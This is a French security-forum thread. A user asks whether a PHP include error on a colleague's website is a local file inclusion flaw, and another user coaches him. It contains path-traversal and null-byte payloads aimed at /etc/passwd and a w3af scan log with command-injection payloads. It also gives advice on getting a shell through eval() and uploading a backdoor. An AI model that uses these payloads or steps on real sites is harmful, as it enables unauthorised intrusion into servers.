LFI possible ? RESOLU

notfound · **Inscription:** 24 Juil 2012, 01:52 **Messages:** 35

Salutations,

Un collègue m'a demandé de "tester" son site, et après quelques tentatives , j'ai eu ce "message" :

Code:

Warning: main(modules/../../../../etc/passwd/main.php) [function.main]: failed to open stream: No such file or directory in /data03/virt6244/domeenid/www.site-victime.com/htdocs/index.php on line xx

Warning: main(modules/../../../../etc/passwd/main.php) [function.main]: failed to open stream: No such file or directory in /data03/virt6244/domeenid/www.site-victime.com/htdocs/index.php on line xx

Warning: main() [function.include]: Failed opening 'modules/../../../../etc/passwd/main.php' for inclusion (include_path='.:') in /data03/virt6244/domeenid/www.site-victime.com/htdocs/index.php on line xx

Est-ce une LFI ? Que faire pour aller plus loin ? Comment l'aider?
Cordialement.

Sh3ll3r · **Inscription:** 16 Juil 2012, 09:42 **Messages:** 42

Salutations!

À mes yeux le code n'est pas sécurisé contre une lfi, pour aller plus loin, essaye simplement d'ajouter %00 devant passwd (je peut supposer que le /main.php est ajouté à la fin de ton URL par le server side ou client side), pour se sécuriser il faut encore une fois, valider côté serveur, les requêtes, pour se sécuriser contre ce genre de disclosure, je te conseille vivement le site de owasp, il y'a une bonne partie dédié à ça avec pas mal d'examples, si tu veux faire un test un peu plus poussé, avec la désavantage d'être automatisé... Tu peut essayer w3af, bon courage pour les recherches!

Cdl
Sh3ll3r

notfound · **Inscription:** 24 Juil 2012, 01:52 **Messages:** 35

Et bien encore merci Sh3ll3r, tu assures

J'vais voir ça, puis en faire part à mon pote avant qu'il se fasse hacker son site.

Edit : en ajoutant %00, toujours rien.

Code:

Warning: main() [function.include]: Failed opening 'modules/etc/\0passwd/main.php' for inclusion (include_path='.:')

Sh3ll3r · **Inscription:** 16 Juil 2012, 09:42 **Messages:** 42

Rebonjour,

Dans le site je pense que tu doit avoir quelque chose: http:\\www.site.com\index.php?page=module, si je me trompe et tu essaye d'appeler un module quelque part d'autre, je te conseille avec un proxy du genre burp ou webscarab, de voir si ce que tu envoi n'est pas modifié client side avant que les requetes arrive sur le serveur.

http:\\www.site.com\index.php?page=../../../../../../../etc/passwd%00, n'oublie pas de dire ce que ton test avec w3af donne.

Cdl
Sh3ll3r

notfound · **Inscription:** 24 Juil 2012, 01:52 **Messages:** 35

Alors, en ce qui concerne http://www.site.com/index.php?page=../. ... /passwd%00
J'obtiens toujours pareil :

Code:

Warning: main() [function.include]: Failed opening 'modules/../../../../../../../etc/passwd\0/main.php' for inclusion (include_path='.:') in .............

Après, qu'appelles-tu module ? J'ai pas vraiment compris, excuse moi :roll:

Pour w3af, je ne connaissais pas. Quel genre de test faut t-il faire, car il y plusieurs "options" ...

Notf0und

Sh3ll3r · **Inscription:** 16 Juil 2012, 09:42 **Messages:** 42

Bonjour,

Alors, un module pour moi c'est la page a charger dans l'exemple, donc [url]http:\\www.site.com\index.php?page=module[/url] module c'est n'importe quelle page que tu demandera, donc a la place de module t'aura quelque chose du genre "[url]http:\\www.site.com\index.php?page=administration[/url]", vu le comportement du serveur (ajouter /main.php a la fin) on peut imaginer que le site est divisé en plusieurs parties, plusieurs répertoires différents et donc modules du site, avec forcement une page de départ, que serai dans ce cas, main.php, pour w3af comme config générique, tu peut cocher la case audit (si tu est en mode gui) et il va activer ce qu'il a besoin sur discovery, tu clique sur démarrer et t'aura un rapport a la fin :p, sinon un bon point de départ c'est http://resources.infosecinstitute.com/w3af-tutorial/, avec ça tu doit avoir une idée intéressante sur comment faire du "tunning" sur tes tests et aussi gérer le framework en ligne de commande. n'hésite pas a poster si tu a des questions.

Cdl
Sh3ll3r

notfound · **Inscription:** 24 Juil 2012, 01:52 **Messages:** 35

Ok pour le module, mais pourquoi tu avais marqué :

Citation:

tu essaye d'appeler un module quelque part d'autre, je te conseille avec un proxy du genre burp ou webscarab, de voir si ce que tu envoi n'est pas modifié client side avant que les requetes arrive sur le serveur.

Ensuite, pour w3af : le résultat est le suivante.

Code:

[lun. 30 juil. 2012 16:28:26 PMT] Auto-enabling plugin: grep.collectCookies
[lun. 30 juil. 2012 16:28:26 PMT] Auto-enabling plugin: grep.httpAuthDetect
[lun. 30 juil. 2012 16:28:26 PMT] Auto-enabling plugin: grep.error500
[lun. 30 juil. 2012 16:28:26 PMT] Auto-enabling plugin: discovery.serverHeader
[lun. 30 juil. 2012 16:28:26 PMT] Auto-enabling plugin: discovery.allowedMethods
[lun. 30 juil. 2012 16:28:26 PMT] Auto-enabling plugin: discovery.frontpage_version
[lun. 30 juil. 2012 16:28:30 PMT] The server header for the remote web server is: "Apache/2.2.22/DataZone SP (Unix) mod_zfpm/0.2". This information was found in the request with id 18.
[lun. 30 juil. 2012 16:28:42 PMT] The URL: "http://www.sitevictime.info/" has the following DAV methods enabled:
[lun. 30 juil. 2012 16:28:42 PMT] - *, ACL, BASELINE_CONTROL, CHECKIN, CHECKOUT, CONNECT, COPY, DEBUG, GET, HEAD, INDEX, INVALID, INVOKE, LABEL, LINK, LOCK, MERGE, MKACTIVITY, MKCOL, MKDIR, MKWORKSPACE, MOVE, NOTIFY, OPTIONS, PATCH, PIN, POLL, POST, PROPFIND, PROPPATCH, REPLY, REPORT, RMDIR, SEARCH, SHOWMETHOD, SPACEJUMP, SUBSCRIBE, SUBSCRIPTIONS, TEXTSEARCH, TRACK, UNCHECKOUT, UNLINK, UNLOCK, UNSUBSCRIBE, VERSION_CONTROL
[lun. 30 juil. 2012 16:28:42 PMT] Found 2 URLs and 4 different points of injection.
[lun. 30 juil. 2012 16:28:42 PMT] The list of URLs is:
[lun. 30 juil. 2012 16:28:42 PMT] - http://www.sitevictime.info
[lun. 30 juil. 2012 16:28:42 PMT] - http://www.google.ee/custom
[lun. 30 juil. 2012 16:28:42 PMT] The list of fuzzable requests is:
[lun. 30 juil. 2012 16:28:42 PMT] - http://www.sitevictime.info | Method: GET
[lun. 30 juil. 2012 16:28:42 PMT] - http://www.google.ee/custom | Method: GET | Parameters: (oe="iso-8859-1", client="pub-647282...", q="", forid="1", hl="en", cof="GALT:#0080...", domains="www.sitevictime...", sitesearch="", ie="iso-8859-1")
[lun. 30 juil. 2012 16:28:42 PMT] - http://www.google.ee/custom | Method: GET | Parameters: (oe="iso-8859-1", client="pub-647282...", q="", forid="1", hl="en", cof="GALT:#0080...", domains="www.sitevictime...", sitesearch="www.sitevictime...", ie="iso-8859-1")
[lun. 30 juil. 2012 16:28:42 PMT] - http://www.google.ee/custom | Method: GET | Parameters: (oe="iso-8859-1", client="pub-647282...", q="", forid="1", hl="en", cof="GALT:#0080...", domains="www.sitevictime...", sitesearch="www.sitevictime...", sitesearch="", ie="iso-8859-1")
[lun. 30 juil. 2012 16:28:42 PMT] The web application sent a persistent cookie.
[lun. 30 juil. 2012 16:28:42 PMT] The following scripts are vulnerable to a trivial form of XSRF:
[lun. 30 juil. 2012 16:28:42 PMT] - http://www.google.ee/custom
[lun. 30 juil. 2012 16:29:03 PMT] The URL: http://www.google.ee/custom is vulnerable to cross site request forgery.
[lun. 30 juil. 2012 16:29:03 PMT] The server header for the remote web server is: "Apache/2.2.22/DataZone SP (Unix) mod_zfpm/0.2". This information was found in the request with id 18.
[lun. 30 juil. 2012 16:29:03 PMT] The URL "http://www.sitevictime.info/" has the following allowed methods, which include DAV methods: *, ACL, BASELINE_CONTROL, CHECKIN, CHECKOUT, CONNECT, COPY, DEBUG, GET, HEAD, INDEX, INVALID, INVOKE, LABEL, LINK, LOCK, MERGE, MKACTIVITY, MKCOL, MKDIR, MKWORKSPACE, MOVE, NOTIFY, OPTIONS, PATCH, PIN, POLL, POST, PROPFIND, PROPPATCH, REPLY, REPORT, RMDIR, SEARCH, SHOWMETHOD, SPACEJUMP, SUBSCRIBE, SUBSCRIPTIONS, TEXTSEARCH, TRACK, UNCHECKOUT, UNLINK, UNLOCK, UNSUBSCRIBE, VERSION_CONTROL.
[lun. 30 juil. 2012 16:29:03 PMT] The URL: "http://www.sitevictime.info" sent the cookie: "PHPSESSID=ca4f2d91067aac2c8e2a025a8bc80be6; path=/". This information was found in the request with id 2.
[lun. 30 juil. 2012 16:29:22 PMT] A possible ReDoS was found at: "http://www.google.ee/custom", using HTTP method GET. The sent data was: "oe=iso-8859-1&client=pub-6472823573423448&q=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaXX%21&forid=1&hl=en&cof=GALT:%23008000%3BGL:1%3BDIV:%23336699%3BVLC:663399%3BAH:center%3BBGC:FFFFFF%3BLBGC:336699%3BALC:0000FF%3BLC:0000FF%3BT:000000%3BGFNT:0000FF%3BGIMP:0000FF%3BFORID:1&domains=www.sitevictime.info&sa=Search&sitesearch=&ie=iso-8859-1". The modified parameter was "q". . Please review manually. This information was found in the request with id 817.
[lun. 30 juil. 2012 16:31:12 PMT] OS Commanding was found at: "http://www.google.ee/custom", using HTTP method GET. The sent data was: "oe=iso-8859-1&client=pub-6472823573423448&q=/bin/cat+/etc/passwd&forid=1&hl=en&cof=GALT:%23008000%3BGL:1%3BDIV:%23336699%3BVLC:663399%3BAH:center%3BBGC:FFFFFF%3BLBGC:336699%3BALC:0000FF%3BLC:0000FF%3BT:000000%3BGFNT:0000FF%3BGIMP:0000FF%3BFORID:1&domains=www.sitevictime.info&sa=Search&sitesearch=&ie=iso-8859-1". The modified parameter was "q". This vulnerability was found in the request with id 1298.
[lun. 30 juil. 2012 16:31:31 PMT] eval() input injection was found at: "http://www.google.ee/custom", using HTTP method GET. The sent data was: "oe=iso-8859-1&client=pub-6472823573423448&q=Thread.Sleep(9000)%3B&forid=1&hl=en&cof=GALT:%23008000%3BGL:1%3BDIV:%23336699%3BVLC:663399%3BAH:center%3BBGC:FFFFFF%3BLBGC:336699%3BALC:0000FF%3BLC:0000FF%3BT:000000%3BGFNT:0000FF%3BGIMP:0000FF%3BFORID:1&domains=www.sitevictime.info&sa=Search&sitesearch=&ie=iso-8859-1". The modified parameter was "q". . Please review manually. This information was found in the request with id 1867.
[lun. 30 juil. 2012 16:34:06 PMT] The URL: "http://www.sitevictime.info" sent these cookies:
[lun. 30 juil. 2012 16:34:06 PMT] - PHPSESSID=ca4f2d91067aac2c8e2a025a8bc80be6; path=/
[lun. 30 juil. 2012 16:34:06 PMT] -  PHPSESSID=ca4f2d91067aac2c8e2a025a8bc80be6; Path=/
[lun. 30 juil. 2012 16:34:06 PMT] Finished scanning process.

Je comprends pas pourquoi il met l'URL http://www.google.ee/custom ?

NotF0und!

Sh3ll3r · **Inscription:** 16 Juil 2012, 09:42 **Messages:** 42

Salutations!

En effet c'est un peu étrange ce comportement, on dirais que le site de ton collegue fait reference ou utilise une librairie javascript que integre un widget de recherche dans son site, que a son tour, utilise google.ee/custom pour effectuer des recherches dans le site. je pense que il faut verifier ça un peu plus loin, car c'est quand meme grave ce que dit le log de w3af, on peut prendre par des points graves:

Citation:

[lun. 30 juil. 2012 16:31:12 PMT] OS Commanding was found at: "http://www.google.ee/custom", using HTTP method GET. The sent data was: "oe=iso-8859-1&client=pub-6472823573423448&q=/bin/cat+/etc/passwd&forid=1&hl=en&cof=GALT:%23008000%3BGL:1%3BDIV:%23336699%3BVLC:663399%3BAH:center%3BBGC:FFFFFF%3BLBGC:336699%3BALC:0000FF%3BLC:0000FF%3BT:000000%3BGFNT:0000FF%3BGIMP:0000FF%3BFORID:1&domains=www.sitevictime.info&sa=Search&sitesearch=&ie=iso-8859-1". The modified parameter was "q". This vulnerability was found in the request with id 1298.

ici on peut voir que il a reussi a faire un cat sur le fichier passwd, donc, une lfi.

et

Citation:

[lun. 30 juil. 2012 16:31:31 PMT] eval() input injection was found at: "http://www.google.ee/custom", using HTTP method GET. The sent data was: "oe=iso-8859-1&client=pub-6472823573423448&q=Thread.Sleep(9000)%3B&forid=1&hl=en&cof=GALT:%23008000%3BGL:1%3BDIV:%23336699%3BVLC:663399%3BAH:center%3BBGC:FFFFFF%3BLBGC:336699%3BALC:0000FF%3BLC:0000FF%3BT:000000%3BGFNT:0000FF%3BGIMP:0000FF%3BFORID:1&domains=www.sitevictime.info&sa=Search&sitesearch=&ie=iso-8859-1". The modified parameter was "q". . Please review manually. This information was found in the request with id 1867.

ici c'est beaucoup plus grave, avec eval() on peut rooter un serveur en quelques cas, sans beaucoup d'effort, un example de ce que on peut faire avec eval est dans ce post ecrit par moi meme:

http://www.hackerzvoice.net/phpbbforum/viewtopic.php?f=65&t=4163

j'ai utilisé une requête sql pour justement, placer un fichier vulnérable dans le serveur, et par la suite j'ai utilisé eval() pour uploader un backdoor et ensuite le lancer et avoir un shell, n'oublie pas de poster si tu a des doutes et sinon je suis dispo sur le irc hzv de 18:00h a 19:00h (gmt+2/paris), déjà ce que tu peut faire, une fois le scan fini avec w3af, si tu est en mode gui, a coté tu a une option exploit, eval doit etre marqué en gras, tu click avec button droit, exploit, et a la fin tu doit avoir un shell, ou tu peut exécuter des commandes avec bien sure les privilèges du utilisateur qui a lancé le processus du serveur web.

Cdl
Sh3ll3r

notfound · **Inscription:** 24 Juil 2012, 01:52 **Messages:** 35

Donc tu as raison oui, il a un widget qui permet de faire de la recherche sur le site ou sur le web.
Mais j'ai du mal à comprendre. Pour moi, de ce que je comprends, c'est que la faille se trouverait sur le site www.google.ee/custom. Or, ça m'étonnerai fortement qu'il y ai une faille sur Google :lol:

Ensuite j'avais à peu près compris pour le message d'erreur :

Code:

OS Commanding was found at: "http://www.google.ee/custom", using HTTP method GET. The sent data was: "oe=iso-8859-1&client=pub-6472823573423448&q=/bin/cat+/etc/passwd&forid=1&hl=en&cof=GALT:%23008000%3BGL:1%3BDIV:%23336699%3BVLC:663399%3BAH:center%3BBGC:FFFFFF%3BLBGC:336699%3BALC:0000FF%3BLC:0000FF%3BT:000000%3BGFNT:0000FF%3BGIMP:0000FF%3BFORID:1&domains=www.sitevictime.info&sa=Search&sitesearch=&ie=iso-8859-1". The modified parameter was "q". This vulnerability was found in the request with id 1298.

Etant un fervu des systèmes Unix, j'avais bien vu la ligne /bin/cat+/etc/passwd mais aucune idée de comment l'utiliser ...

En ce qui concerne la faille SQL, j'irai lire ton post mais je suis pas sur de pouvoir faire quelques choses de concluant tout seul

Bref, je viendrai sur irc tout à l'heure !

LFI possible ? RESOLU

Qui est en ligne